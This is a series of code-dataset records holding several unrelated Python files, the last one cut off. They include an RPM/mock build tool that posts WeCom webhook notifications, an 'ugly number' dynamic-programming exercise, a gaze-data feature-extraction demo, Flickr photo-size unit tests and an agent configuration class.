False","repo_name":"starenka/ara","sub_path":"isgd.py","file_name":"isgd.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"29143123756","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n Authors:\n yifengyou <842056007@qq.com>\n\"\"\"\n\nimport argparse\nimport datetime\nimport glob\nimport json\nimport logging\nimport os\nimport os.path\nimport re\nimport subprocess\nimport sys\nimport time\nfrom logging.handlers import RotatingFileHandler\n\nimport requests\nimport select\n\nCURRENT_VERSION = \"0.1.0\"\nlogger = None\ntimestamp = datetime.datetime.now().strftime(\"%Y-%m-%d_%H%M%S\")\nmsg_token = \"4155d89f-0b1c-44a8-8411-4f40c1d95795\"\n\n\ndef timer(func):\n def wrapper(*args, **kwargs):\n start = time.time()\n result = func(*args, **kwargs)\n end = time.time()\n elapsed = end - start\n logger.info(f\"{func.__name__} took {elapsed} seconds\")\n return result\n\n return wrapper\n\n\nclass Wecom():\n \"\"\"\n 企业微信群聊机器人,官方文档:https://developer.work.weixin.qq.com/document/path/91770\n \"\"\"\n\n def __init__(self, key=None):\n if key is None:\n raise Exception(\" wecom api key is None \")\n self._key = key\n\n def do_send(self, data):\n res = None\n headers = {'Content-Type': 'application/json'}\n url = f'https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key={self._key}'\n r = requests.post(url=url, headers=headers, data=json.dumps(data))\n try:\n res = json.loads(r.text)\n except:\n pass\n if r.status_code == 200 and res and 'errcode' in res and 0 == res['errcode']:\n logger.info('* wecomBot send msg success')\n else:\n logger.info('* wecomBot send msg failed!')\n logger.info(r.text)\n\n def 
send_markdown(self, msg):\n data = {\n \"msgtype\": \"markdown\",\n \"markdown\": {\n \"content\": msg,\n },\n }\n self.do_send(data)\n\n\ndef init_logger(args):\n global logger, timestamp\n logger = logging.getLogger(\"mbuild\")\n console_handler = logging.StreamHandler(sys.stderr)\n console_handler.setFormatter(logging.Formatter('%(asctime)s [%(levelname)s] %(name)s: %(message)s'))\n logger.addHandler(console_handler)\n logfile = os.path.join(args.workdir,\n \"mbuild_\" + timestamp\n )\n file_handler = RotatingFileHandler(\n filename=logfile,\n encoding='UTF-8',\n maxBytes=1024000,\n backupCount=10\n )\n file_handler.setFormatter(logging.Formatter('%(asctime)s [%(levelname)s] %(name)s: %(message)s'))\n logger.addHandler(file_handler)\n logger.setLevel(logging.INFO)\n\n\ndef check_python_version():\n current_python = sys.version_info[0]\n if current_python == 3:\n return\n else:\n raise Exception('Invalid python version requested: %d' % current_python)\n\n\ndef do_exe_cmd(cmd, print_output=False, shell=False):\n stdout_output = ''\n stderr_output = ''\n if isinstance(cmd, str):\n cmd = cmd.split()\n elif isinstance(cmd, list):\n pass\n else:\n raise Exception(\"unsupported type when run do_exec_cmd\", type(cmd))\n\n # print(\"Run cmd:\" + \" \".join(cmd))\n p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=shell)\n while True:\n # 使用select模块,监控stdout和stderr的可读性,设置超时时间为0.1秒\n rlist, _, _ = select.select([p.stdout, p.stderr], [], [], 0.1)\n # 遍历可读的文件对象\n for f in rlist:\n # 读取一行内容,解码为utf-8\n line = f.readline().decode('utf-8').strip()\n # 如果有内容,判断是stdout还是stderr,并打印到屏幕,并刷新缓冲区\n if line:\n if f == p.stdout:\n if print_output == True:\n print(\"STDOUT\", line)\n stdout_output += line + '\\n'\n sys.stdout.flush()\n elif f == p.stderr:\n if print_output == True:\n print(\"STDERR\", line)\n stderr_output += line + '\\n'\n sys.stderr.flush()\n else:\n print(\"UNKOWN:\", line)\n if p.poll() is not None:\n break\n return p.returncode, stdout_output, stderr_output\n\n\ndef do_sendmsg(args, ret=0, stdout=\"\", stderr=\"\", extra=\"\"):\n if not args.quiet:\n msg_sender = Wecom(key=msg_token)\n format_msg = f\"# mbuild消息播报:\\n\" \\\n f\"命令 : <font color=\\\"info\\\">{' '.join(sys.argv)}</font>\\n\" \\\n f\"返回值 : {ret}\\n\" \\\n f\"输出 : {stdout}\\n\" \\\n f\"错误 : {stderr}\\n\" \\\n f\"附加 : {extra}\\n\" \\\n f\"开始时间 : {timestamp}\\n\" \\\n f\"结束时间 : {datetime.datetime.now().strftime('%Y-%m-%d_%H%M%S')}\"\n msg_sender.send_markdown(msg=format_msg)\n\n\ndef handle_stat(args):\n pass\n\n\ndef rpmbuild_per_srpm(srpm):\n # 获取srpm名称 N-V-R\n ret, srpm_name, stderr = do_exe_cmd([\"rpm\", \"-qp\", \"--queryformat\", \"%{NAME}\", srpm], print_output=True)\n if ret != 0:\n logger.error(f\" query srpm file ret is not zero [{ret}] {stderr}\")\n return\n srpm_name = srpm_name.strip()\n logger.info(f\"srpm name : [{srpm_name}]\")\n\n # 创建构建目录\n topdir = os.path.dirname(srpm)\n mbuilddir = os.path.join(topdir, srpm_name)\n if not os.path.exists(mbuilddir):\n os.makedirs(mbuilddir, exist_ok=True)\n logger.info(f\"mbuild dir : {mbuilddir}\")\n rpmbuilddir = os.path.join(mbuilddir, \"rpmbuild_\" + timestamp)\n if not os.path.exists(mbuilddir):\n os.makedirs(rpmbuilddir, exist_ok=True)\n logger.info(f\"rpmbuild dir : {rpmbuilddir}\")\n\n ret, stdout, stderr = do_exe_cmd(\n [\"rpm\", \"-ivh\", \"--define\", f\"_topdir {rpmbuilddir}\", f\"{srpm}\"],\n print_output=True\n )\n if ret != 0:\n # logger.error(f\" install srpm {srpm} to {rpmbuilddir} failed! 
[{ret}] {stderr}\")\n errorlog = os.path.join(mbuilddir, \"mbuild_srpminstall_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n # 检查spec\n specs = glob.glob(f\"{rpmbuilddir}/SPECS/*.spec\")\n if len(specs) == 0:\n logger.error(f\"no specs found!\")\n return\n elif len(specs) > 1:\n logger.error(f\"found spec more than one [{len(specs)}]\")\n return\n spec = os.path.abspath(specs[0])\n logger.info(f\"using spec {spec}\")\n\n # 导出rpm -qa记录\n ret, stdout, stderr = do_exe_cmd([\"rpm\", \"-qa\"], print_output=False)\n if ret != 0:\n # logger.error(f\" query all rpm failed! [{ret}] {stderr}\")\n errorlog = os.path.join(mbuilddir, \"mbuild_rpmqa_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n rpm_manifest = os.path.join(mbuilddir, \"mbuild_rpm-manifest_\" + timestamp)\n with open(rpm_manifest, 'w') as fd:\n fd.write(stdout)\n\n # 安裝依赖\n ret, stdout, stderr = do_exe_cmd([\"yum\", \"builddep\", \"-y\", spec], print_output=True)\n if ret != 0:\n # logger.error(f\" yum builddep failed! [{ret}] {stderr}\")\n errorlog = os.path.join(mbuilddir, \"mbuild_builddep_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n buildlog = os.path.join(mbuilddir, \"mbuild_builddep.log_\" + timestamp)\n with open(buildlog, 'w') as fd:\n fd.write(stdout)\n\n # rpmbuild编译\n ret, stdout, stderr = do_exe_cmd(\n [\"rpmbuild\", \"--define\", f\"_topdir {rpmbuilddir}\", \"-ba\", f\"{spec}\", \"--nocheck\"],\n print_output=True)\n if ret != 0:\n # logger.error(f\" rpmbuild failed! [{ret}] {stderr}\")\n errorlog = os.path.join(mbuilddir, \"mbuild_build_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n buildlog = os.path.join(mbuilddir, \"mbuild_rpmbuild.log_\" + timestamp)\n with open(buildlog, 'w') as fd:\n fd.write(stdout)\n\n\n@timer\ndef handle_build(args):\n if not os.path.exists(args.workdir) or not os.path.isdir(args.workdir):\n print(f\"{args.workdir} is not a valid directory\")\n exit(1)\n\n workdir = os.path.abspath(args.workdir)\n init_logger(args)\n logger.info(f\"workdir: {workdir}\")\n\n if args.srpm and len(args.srpm) > 0:\n total = len(args.srpm)\n for index, srpm in enumerate(args.srpm):\n if not os.path.exists(srpm) or not os.path.isfile(srpm):\n logger.error(f\"{srpm} is not a valid srpm file\")\n exit(1)\n srpm_path = os.path.abspath(srpm)\n logger.info(f\"[{index + 1}/{total}] build {srpm}\")\n rpmbuild_per_srpm(srpm_path)\n else:\n srpms = glob.glob(f\"{args.workdir}/*.src.rpm\")\n if not srpms:\n logger.error(f\"No src.rpm found in {args.workdir}\")\n exit(1)\n total = len(srpms)\n for index, srpm in enumerate(srpms):\n srpm_path = os.path.abspath(srpm)\n logger.info(f\"[{index + 1}/{total}] build {srpm}\")\n rpmbuild_per_srpm(srpm_path)\n\n if not args.quiet:\n msg_sender = Wecom(key=msg_token)\n format_msg = f\"# mbuild消息播报:\\n\" \\\n f\"命令 : <font color=\\\"info\\\">{' '.join(sys.argv)}</font>\\n\" \\\n f\"开始时间 : {timestamp}\\n\" \\\n f\"结束时间 : {datetime.datetime.now().strftime('%Y-%m-%d_%H%M%S')}\"\n msg_sender.send_markdown(msg=format_msg)\n\n\n@timer\ndef handle_localinstall(args):\n if not os.path.exists(args.workdir) or not os.path.isdir(args.workdir):\n print(f\"{args.workdir} is not a valid directory\")\n exit(1)\n\n workdir = os.path.abspath(args.workdir)\n init_logger(args)\n logger.info(f\"workdir: {workdir}\")\n\n if not args.srpm:\n logger.error(f\" must specific 
target srpm\")\n\n if not os.path.exists(args.srpm) or not os.path.isfile(args.srpm):\n logger.error(f\"{args.srpm} is not a valid srpm file\")\n exit(1)\n srpm_path = os.path.abspath(args.srpm)\n\n ret, stdout, stderr = do_exe_cmd(\n [\"rpm\", \"-ivh\", \"--define\", f\"_topdir {workdir}\", f\"{srpm_path}\"],\n print_output=True\n )\n if ret != 0:\n # logger.error(f\" install srpm {srpm} to {rpmbuilddir} failed! [{ret}] {stderr}\")\n errorlog = os.path.join(workdir, \"mbuild_srpminstall_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n else:\n logger.info(f\"localinstall {srpm_path} success!\")\n\n if not args.quiet:\n msg_sender = Wecom(key=msg_token)\n format_msg = f\"# mbuild消息播报:\\n\" \\\n f\"命令 : <font color=\\\"warning\\\">{' '.join(sys.argv)}</font>\\n\" \\\n f\"开始时间 : {timestamp}\\n\" \\\n f\"结束时间 : {datetime.datetime.now().strftime('%Y-%m-%d_%H%M%S')}\"\n msg_sender.send_markdown(msg=format_msg)\n\n\n@timer\ndef handle_localbuild(args):\n \"\"\"\n 编译指定目录\n :param args:\n :return:\n \"\"\"\n if not os.path.exists(args.workdir) or not os.path.isdir(args.workdir):\n print(f\"{args.workdir} is not a valid directory\")\n exit(1)\n\n workdir = os.path.abspath(args.workdir)\n init_logger(args)\n logger.info(f\"workdir: {workdir}\")\n\n # 检查工作目录是否为rpmbuild目录(包含SOURCES、SPECS)\n if not os.path.exists(os.path.join(workdir, \"SOURCES\")) or not os.path.exists(os.path.join(workdir, \"SPECS\")):\n logger.error(f\"No SOURCES or SPECS dir found in {workdir}\")\n return\n\n # 检查spec,获取SPEC绝对路径spec\n specs = glob.glob(f\"{workdir}/SPECS/*.spec\")\n if len(specs) == 0:\n logger.error(f\"no specs found!\")\n return\n elif len(specs) > 1:\n logger.error(f\"found spec more than one [{len(specs)}]\")\n return\n spec = os.path.abspath(specs[0])\n logger.info(f\"using spec {spec}\")\n\n # 导出rpm -qa记录\n ret, stdout, stderr = do_exe_cmd([\"rpm\", \"-qa\"], print_output=False)\n if ret != 0:\n # logger.error(f\" query all rpm failed! [{ret}] {stderr}\")\n errorlog = os.path.join(workdir, \"mbuild_rpmqa_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n rpm_manifest = os.path.join(workdir, \"mbuild_rpm-manifest_\" + timestamp)\n with open(rpm_manifest, 'w') as fd:\n fd.write(stdout)\n\n # 安裝依赖\n ret, stdout, stderr = do_exe_cmd([\"yum\", \"builddep\", \"-y\", spec], print_output=True)\n if ret != 0:\n # logger.error(f\" yum builddep failed! [{ret}] {stderr}\")\n errorlog = os.path.join(workdir, \"mbuild_builddep_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n buildlog = os.path.join(workdir, \"mbuild_builddep.log_\" + timestamp)\n with open(buildlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n\n # rpmbuild编译\n ret, stdout, stderr = do_exe_cmd(\n [\"rpmbuild\", \"--define\", f\"_topdir {workdir}\", \"-ba\", f\"{spec}\", \"--nocheck\"],\n print_output=True\n )\n if ret != 0:\n # logger.error(f\" rpmbuild failed! 
[{ret}] {stderr}\")\n errorlog = os.path.join(workdir, \"mbuild_build_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n buildlog = os.path.join(workdir, \"mbuild_rpmbuild.log_\" + timestamp)\n with open(buildlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n\n if not args.quiet:\n msg_sender = Wecom(key=msg_token)\n format_msg = f\"# mbuild消息播报:\\n\" \\\n f\"命令 : <font color=\\\"info\\\">{' '.join(sys.argv)}</font>\\n\" \\\n f\"开始时间 : {timestamp}\\n\" \\\n f\"结束时间 : {datetime.datetime.now().strftime('%Y-%m-%d_%H%M%S')}\"\n msg_sender.send_markdown(msg=format_msg)\n\n\ndef handle_clean(args):\n if not os.path.exists(args.workdir) or not os.path.isdir(args.workdir):\n print(f\"{args.workdir} is not a valid directory\")\n exit(1)\n\n workdir = os.path.abspath(args.workdir)\n print(f\"workdir: {workdir}\")\n\n # 检查spec\n logs = glob.glob(f\"{workdir}/mbuild_*\")\n if len(logs) == 0:\n print(f\"no mbuild log found! bye~\")\n return\n for l in logs:\n if os.path.isfile(l):\n os.remove(l)\n print(f\"delete {l} done!\")\n print(f\"clean done\")\n\n\ndef mockbuild_per_srpm(args, srpm):\n srpm_path = os.path.abspath(srpm)\n\n # 选择输出目录\n if not args.output:\n # 获取srpm名称 N-V-R\n ret, srpm_name, stderr = do_exe_cmd(\n [\"rpm\", \"-qp\", \"--nosignature\", \"--nodigest\", \"--queryformat\", \"%{NAME}\", srpm_path],\n print_output=False\n )\n if ret != 0:\n msg = f\" query srpm file ret is not zero [{ret}] {stderr}\"\n logger.error(msg)\n do_sendmsg(args, ret=-1, stderr=msg)\n return\n srpm_name = srpm_name.strip()\n logger.info(f\"srpm name : [{srpm_name}]\")\n\n # 创建构建目录\n topdir = os.path.dirname(srpm_path)\n output_dir = os.path.join(topdir, srpm_name)\n if not os.path.exists(output_dir):\n os.makedirs(output_dir, exist_ok=True)\n logger.info(f\"output_dir dir : {output_dir}\")\n else:\n try:\n os.makedirs(args.output, exist_ok=True)\n except Exception as e:\n msg = f\"failed to create {args.output}\"\n logger.error(msg)\n do_sendmsg(args, ret=-1, stderr=msg)\n exit(1)\n output_dir = args.output\n\n if not args.root:\n root = \"rocky-8-x86_64\"\n else:\n root = args.root\n\n # mock编译\n cmd = [\n \"/usr/bin/mock\",\n \"--root\", f\"{root}\",\n \"--rebuild\", f\"{srpm_path}\",\n \"--resultdir\", f\"{output_dir}\",\n \"--verbose\"\n ]\n logger.info(f\"run cmd {' '.join(cmd)}\")\n ret, stdout, stderr = do_exe_cmd(cmd, print_output=True, shell=False)\n if ret != 0:\n # logger.error(f\" rpmbuild failed! 
[{ret}] {stderr}\")\n errorlog = os.path.join(output_dir, \"mbuild_mock_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n do_sendmsg(args, ret=ret)\n return\n buildlog = os.path.join(output_dir, \"mbuild_mock.log_\" + timestamp)\n with open(buildlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n\n\n@timer\ndef handle_mock(args):\n if not os.path.exists(args.workdir) or not os.path.isdir(args.workdir):\n print(f\"{args.workdir} is not a valid directory\")\n exit(1)\n\n workdir = os.path.abspath(args.workdir)\n init_logger(args)\n logger.info(f\"workdir: {workdir}\")\n\n if args.srpm:\n if not os.path.exists(args.srpm) or not os.path.isfile(args.srpm):\n logger.error(f\"{args.srpm} is not a valid srpm file\")\n exit(1)\n srpm_path = os.path.abspath(args.srpm)\n mockbuild_per_srpm(args, srpm_path)\n else:\n srpms = glob.glob(f\"{args.workdir}/*.src.rpm\")\n if not srpms:\n logger.error(f\"No src.rpm found in {args.workdir}\")\n exit(1)\n total = len(srpms)\n for index, srpm in enumerate(srpms):\n srpm_path = os.path.abspath(srpm)\n logger.info(f\"[{index + 1}/{total}] build {srpm}\")\n mockbuild_per_srpm(args, srpm_path)\n\n do_sendmsg(args)\n\n\ndef handle_check(args):\n if not os.path.exists(args.workdir) or not os.path.isdir(args.workdir):\n print(f\"{args.workdir} is not a valid directory\")\n exit(1)\n\n workdir = os.path.abspath(args.workdir)\n print(f\"workdir: {workdir}\")\n\n def find_rpm_files(dir_path):\n flag = False\n rpms = []\n for entry in os.scandir(dir_path):\n if entry.is_file() and entry.name.endswith(\".rpm\"):\n flag = True\n rpms.append(os.path.basename(entry.path))\n elif entry.is_dir():\n find_rpm_files(entry.path)\n if flag:\n print(f\"[+] {os.path.abspath(dir_path)}\")\n for r in rpms:\n print(f\"\\t[-] {r}\")\n\n find_rpm_files(workdir)\n\n\ndef main():\n global CURRENT_VERSION\n check_python_version()\n\n parser = argparse.ArgumentParser(add_help=False)\n parser.add_argument(\"-v\", \"--version\", action=\"store_true\",\n help=\"show program's version number and exit\")\n parser.add_argument(\"-h\", \"--help\", action=\"store_true\",\n help=\"show this help message and exit\")\n\n subparsers = parser.add_subparsers()\n\n # 定义base命令用于集成\n parent_parser = argparse.ArgumentParser(add_help=False, description=\"mbuild - a tool for kernel development\")\n parent_parser.add_argument(\"-V\", \"--verbose\", default=None, action=\"store_true\", help=\"show verbose output\")\n parent_parser.add_argument(\"-j\", \"--job\", default=os.cpu_count(), type=int, help=\"job count\")\n parent_parser.add_argument(\"-o\", \"--output\", default=None, help=\"output dir path\")\n parent_parser.add_argument(\"-w\", \"--workdir\", default=\".\", help=\"setup workdir\")\n parent_parser.add_argument('-d', '--debug', default=None, action=\"store_true\", help=\"enable debug output\")\n parent_parser.add_argument('-q', '--quiet', default=False, action=\"store_true\", help=\"keep quiet, no msg send\")\n\n # 添加子命令 stat\n parser_stat = subparsers.add_parser('stat', parents=[parent_parser])\n parser_stat.set_defaults(func=handle_stat)\n\n # 添加子命令 build\n parser_build = subparsers.add_parser('build', parents=[parent_parser])\n parser_build.add_argument('-s', '--srpm', nargs=\"+\", default=None, help=\"build specific srpm\")\n parser_build.set_defaults(func=handle_build)\n\n # 添加子命令 localinstall\n parser_localinstall = subparsers.add_parser('localinstall', parents=[parent_parser])\n parser_localinstall.set_defaults(func=handle_localinstall)\n\n # 
添加子命令 localbuild\n parser_localbuild = subparsers.add_parser('localbuild', parents=[parent_parser])\n parser_localbuild.set_defaults(func=handle_localbuild)\n\n # 添加子命令 handle_mock\n parser_mock = subparsers.add_parser('mock', parents=[parent_parser])\n parser_mock.add_argument('-r', '--root', default=None, help=\"specific mock config\")\n parser_mock.add_argument('-s', '--srpm', nargs=\"+\", default=None, help=\"build specific srpm\")\n parser_mock.set_defaults(func=handle_mock)\n\n # 添加子命令 clean\n parser_clean = subparsers.add_parser('clean', parents=[parent_parser])\n parser_clean.set_defaults(func=handle_clean)\n\n # 添加子命令 check\n parser_check = subparsers.add_parser('check', parents=[parent_parser])\n parser_check.set_defaults(func=handle_check)\n\n # 开始解析命令\n args = parser.parse_args()\n\n # 解析命令后解析配置文件,合并两者\n for filename in os.listdir('.'):\n if filename.endswith(\".mbuild\"):\n print(\"load config file %s\" % filename)\n with open(filename, 'r', encoding='utf8') as f:\n for line in f:\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n match = re.match(r'(\\w+)\\s*=\\s*([\\w/.-]+)', line)\n if match:\n key = match.group(1)\n value = match.group(2)\n # 如果命令行没有定义key,则使用配置中的KV\n if not hasattr(args, key):\n setattr(args, key, value)\n # 如果命令行未打开选项,但配置中打开,则使用配置中的KV\n if getattr(args, key) is None:\n setattr(args, key, value)\n\n if args.version:\n print(\"mbuild %s\" % CURRENT_VERSION)\n sys.exit(0)\n elif args.help or len(sys.argv) < 2:\n parser.print_help()\n sys.exit(0)\n else:\n args.func(args)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"yifengyou/mbuild","sub_path":"mbuild.py","file_name":"mbuild.py","file_ext":"py","file_size_in_byte":22417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"73408741449","text":"\"\"\"\n못생긴 수(31p) \n\n못생긴 수란 오직 2, 3, 5만을 소인수로 가지는 수를 의미한다. 1은 못생긴 수라고 가정한다. 이때 n번째 못생긴 수를 찾는 프로그램을 작성하시오. 
예를 들어 11번째 못생긴 수는 15입니다.\n(1, 2, 3, 4, 5, 6, 8, 9, 10, 12, 15, ...)\n\n입력\n첫째 줄에 n이 입력(1부터 1000까지)\n\n출력\nn번째 못생긴 수 출력\n\"\"\"\n\nn=int(input())\n\ndp=[0]*n\ndp[0]=1\n\ni2,i3,i5=0,0,0\nnext2,next3,next5=2,3,5\n\nfor i in range(1,n):\n\tdp[i]=min(next2,next3,next5)\n\n\t#못생긴 수에 2 or 3 or 5를 곱한 수도 못생긴 수\n\n\tif dp[i]==next2:\n\t\ti2+=1\n\t\tnext2=dp[i2]*2\n\tif dp[i]==next3:\n\t\ti3+=1\n\t\tnext3=dp[i3]*3\n\tif dp[i]==next5:\n\t\ti5+=1\n\t\tnext5=dp[i5]*5\n\nprint(dp[n-1])\n\t\t","repo_name":"YoungWoongJoo/Learning-Algorithm-With-Python","sub_path":"Dynamic Programming/practice5.py","file_name":"practice5.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39027666041","text":"from data_loading import gazeRE_DataLoader\nfrom features.feature_extractor import LongestVisitFeatureExtractor, extract_training_data\n\nif __name__ == '__main__':\n # Set the minimal number of fixations for a visit and the minimal visit duration to be considered\n min_fixations = 0\n min_visit_duration = 3\n\n # Set the feature export directory\n target_dir = \"./\"\n\n # Intialize the gazeRE_Dataloader which loads the dataset\n dataloader = gazeRE_DataLoader(data_dir=\"data\", googleNQ=True, gREL=True)\n\n # Initialize the FeatureExtractor with LongestVisitFeatureExtractor which takes the longest visit for each paragraph\n feature_extractor = LongestVisitFeatureExtractor(\n min_visit_duration=min_visit_duration, min_fixations=min_fixations, screen_width=2560, screen_height=1440\n )\n\n # Extract the feature file for the g-REL corpus\n d_grel = extract_training_data(study_data=dataloader.grel, target_dir=target_dir,\n feature_extractor=feature_extractor)\n\n # Extract the feature file for the Google NQ corpus\n d_nq = extract_training_data(study_data=dataloader.google_nq, target_dir=target_dir,\n feature_extractor=feature_extractor)\n","repo_name":"DFKI-Interactive-Machine-Learning/gazeRE-dataset","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41013889408","text":"import flickr_api as f\nimport unittest\n\n\nclass TestPhotoSizes(unittest.TestCase):\n def test_video_largest_size(self):\n p = f.objects.Photo(\n id=1234,\n sizes={\n \"HD MP4\":\n dict(\n media=\"video\",\n url=\"v@url\",\n source=\"v@source\",\n width=100,\n height=100,\n ),\n \"Large\":\n dict(\n media=\"photo\",\n url=\"p@url\",\n source=\"p@source\",\n width=2000,\n height=2000)\n },\n media=\"video\")\n self.assertEqual(\"HD MP4\", p._getLargestSizeLabel())\n\n def test_video_none_entry(self):\n p = f.objects.Photo(\n id=1234,\n sizes={\n \"HD MP4\":\n dict(\n media=\"video\",\n url=\"v@url\",\n source=\"v@source\",\n width=100,\n height=100,\n ),\n 700:\n dict(\n media=\"video\",\n url=\"v@url2\",\n source=\"v@source2\",\n width=None,\n height=None)\n },\n media=\"video\")\n self.assertEqual(\"HD MP4\", p._getLargestSizeLabel())\n\n def test_video_output_filename(self):\n p = f.objects.Photo(\n id=1234,\n sizes={\n \"HD MP4\":\n dict(\n media=\"video\",\n url=\"v@url\",\n source=\"v@source\",\n width=100,\n height=100,\n )\n },\n media=\"video\")\n self.assertEqual(\"source.mp4\", p._getOutputFilename(\"source\", \"HD MP4\"))\n self.assertEqual(\"source.mp4\", p._getOutputFilename(\"source.mp4\", \"HD MP4\"))\n self.assertEqual(\"source.jpeg\", p._getOutputFilename(\"source.jpeg\", \"HD MP4\"))\n\n def 
test_photo_output_filename(self):\n p = f.objects.Photo(\n id=1234,\n sizes={\n \"Large\":\n dict(\n media=\"photo\",\n url=\"p@url\",\n source=\"p/source.jpg\",\n width=2000,\n height=2000)\n },\n media=\"photo\")\n self.assertEqual(\"source.jpg\", p._getOutputFilename(\"source\", \"Large\"))\n self.assertEqual(\"source.jpg\", p._getOutputFilename(\"source.jpg\", \"Large\"))\n self.assertEqual(\"source.jpeg\", p._getOutputFilename(\"source.jpeg\", \"Large\"))\n\n\n def test_photo_largest_size(self):\n p = f.objects.Photo(\n id=1234,\n sizes={\n \"HD MP4\":\n dict(\n media=\"video\",\n url=\"v@url\",\n source=\"v@source\",\n width=100,\n height=100,\n ),\n \"Large\":\n dict(\n media=\"photo\",\n url=\"p@url\",\n source=\"p@source\",\n width=2000,\n height=2000)\n },\n media=\"photo\")\n self.assertEqual(\"Large\", p._getLargestSizeLabel())\n\n def test_photo_largest_size_original(self):\n \"\"\"Test that the original size is returned if it is as big as the largest size\"\"\"\n p = f.objects.Photo(\n id=1234,\n sizes={\n \"Large\":\n dict(\n media=\"photo\",\n url=\"p@url\",\n source=\"p@source\",\n width=2000,\n height=2000),\n \"Original\":\n dict(\n media=\"photo\",\n url=\"p@url\",\n source=\"p@source\",\n width=2000,\n height=2000)\n },\n media=\"photo\")\n self.assertEqual(\"Original\", p._getLargestSizeLabel())\n\n def test_parse_inline_sizes(self):\n self.maxDiff = None\n sizes = f.objects._parse_inline_sizes({\n 'title':\n 'Noir comme le soleil',\n 'owner':\n f.objects.Person(id=\"qwerty\", token=\"abcde\"),\n 'id':\n 16180339,\n 'ispublic':\n True,\n 'isfriend':\n False,\n 'isfamily':\n False,\n 'url_c':\n 'https://farm5.staticflickr.com/X/46284324564_0a1bf6145a_c.jpg',\n 'height_c':\n 534,\n 'width_c':\n '800',\n 'url_l':\n 'https://farm5.staticflickr.com/X/46284324564_0a1bf6145a_b.jpg',\n 'height_l':\n '684',\n 'width_l':\n '1024',\n 'url_o':\n 'https://farm5.staticflickr.com/X/46284324564_2baac8acd5_o.jpg',\n 'height_o':\n '4016',\n 'width_o':\n '6016',\n 'media':\n 'photo',\n })\n self.assertEqual({\n 'Original': {\n 'label':\n 'Original',\n 'width':\n '6016',\n 'height':\n '4016',\n 'source':\n 'https://farm5.staticflickr.com/X/46284324564_2baac8acd5_o.jpg',\n 'url':\n 'https://www.flickr.com/photos/qwerty/16180339/sizes/o/',\n 'media':\n 'photo'\n },\n 'Medium 800': {\n 'label':\n 'Medium 800',\n 'width':\n '800',\n 'height':\n 534,\n 'source':\n 'https://farm5.staticflickr.com/X/46284324564_0a1bf6145a_c.jpg',\n 'url':\n 'https://www.flickr.com/photos/qwerty/16180339/sizes/c/',\n 'media':\n 'photo'\n },\n 'Large': {\n 'label':\n 'Large',\n 'width':\n '1024',\n 'height':\n '684',\n 'source':\n 'https://farm5.staticflickr.com/X/46284324564_0a1bf6145a_b.jpg',\n 'url':\n 'https://www.flickr.com/photos/qwerty/16180339/sizes/l/',\n 'media':\n 'photo'\n },\n }, sizes)\n","repo_name":"alexis-mignon/python-flickr-api","sub_path":"test/test_parse_sizes.py","file_name":"test_parse_sizes.py","file_ext":"py","file_size_in_byte":6511,"program_lang":"python","lang":"en","doc_type":"code","stars":360,"dataset":"github-code","pt":"16"} +{"seq_id":"41793445934","text":"import os.path\n\nimport yaml\n\nfrom agents.agents_factory import create_agent_by_type\nfrom agents.base_agent import BASE_AGENT_TYPE\nfrom config.constants import DEFAULT_START_PROMPT_PATH, INITIAL_USER_INPUT, PRESETS_DIR\n\n\nclass AgentConfig:\n # consturctor\n def __init__(self, commands_set_path=None,\n model='gpt-3.5-turbo', max_tokens=4000,\n temperature=0.1, top_p=1, frequency_penalty=0, presence_penalty=0,\n 
include_constraints_resources_prompt=True, include_response_format_prompt=True,\n include_commands_set=True, save_model=True, autonomous=False, type=BASE_AGENT_TYPE,\n prompt_start_path=DEFAULT_START_PROMPT_PATH,\n default_user_input=INITIAL_USER_INPUT, max_personal_goals=5):\n\n if not prompt_start_path:\n prompt_start_path = DEFAULT_START_PROMPT_PATH\n\n self.config_map = {\n 'type': type,\n 'model': model,\n 'top_p': top_p,\n 'save_model': save_model,\n 'autonomous': autonomous,\n 'max_tokens': max_tokens,\n 'temperature': temperature,\n 'prompt_start_path': prompt_start_path,\n 'presence_penalty': presence_penalty,\n 'frequency_penalty': frequency_penalty,\n 'commands_set_path': commands_set_path,\n 'default_user_input': default_user_input,\n 'max_personal_goals': max_personal_goals,\n 'include_commands_set': include_commands_set,\n 'include_response_format_prompt': include_response_format_prompt,\n 'include_constraints_resources_prompt': include_constraints_resources_prompt,\n\n }\n\n def get(self, key):\n return self.config_map[key]\n\n def to_dict(self):\n return self.config_map\n\n def __dict__(self):\n return self.config_map\n\n @staticmethod\n def from_dict(dict_input):\n return AgentConfig(**dict_input)\n\n @staticmethod\n def from_preset(name):\n path = os.path.join(PRESETS_DIR, 